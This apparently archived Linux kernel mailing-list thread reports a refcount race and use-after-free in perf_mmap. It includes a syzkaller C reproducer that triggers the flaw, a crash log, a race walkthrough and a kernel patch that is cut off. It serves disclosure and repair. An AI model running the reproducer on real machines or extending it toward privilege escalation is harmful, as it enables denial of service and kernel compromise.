__ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
> Can you turn this into a patch we can apply (properly sent, real name Hi Greg, Sorry for not knowing the rules and sending to the wrong people mistakenly. I have just submitted the formal patch to the perf subsystem maintainers with the correct formatting and real name. Thanks for the guidance! Best regards, Haocheng Yu
{ "author": "=?UTF-8?B?5L2Z5piK6ZOW?= <haochengyu@zju.edu.cn>", "date": "Sun, 1 Feb 2026 19:35:31 +0800 (GMT+08:00)", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + 